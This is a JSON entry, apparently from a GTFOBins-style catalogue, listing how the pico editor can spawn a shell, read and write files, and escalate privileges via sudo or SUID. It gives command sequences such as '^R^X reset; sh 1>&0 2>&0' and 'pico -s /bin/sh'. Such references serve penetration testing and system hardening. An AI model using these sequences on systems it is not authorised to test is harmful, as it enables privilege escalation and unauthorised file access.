{ "functions": { "shell": [ { "code": "pico\n^R^X\nreset; sh 1>&0 2>&0\n" }, { "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.", "code": "pico -s /bin/sh\n/bin/sh\n^T\n" } ], "file-write": [ { "code": "pico [file]\n[data]\n^O\n" } ], "file-read": [ { "code": "pico [file]" } ], "limited-suid": [ { "description": "The 'SPELL' environment variable can be used in place of the '-s' option if the command line cannot be changed.", "code": "./pico -s /bin/sh\n/bin/sh\n^T\n" } ], "sudo": [ { "code": "sudo pico\n^R^X\nreset; sh 1>&0 2>&0\n" } ] } }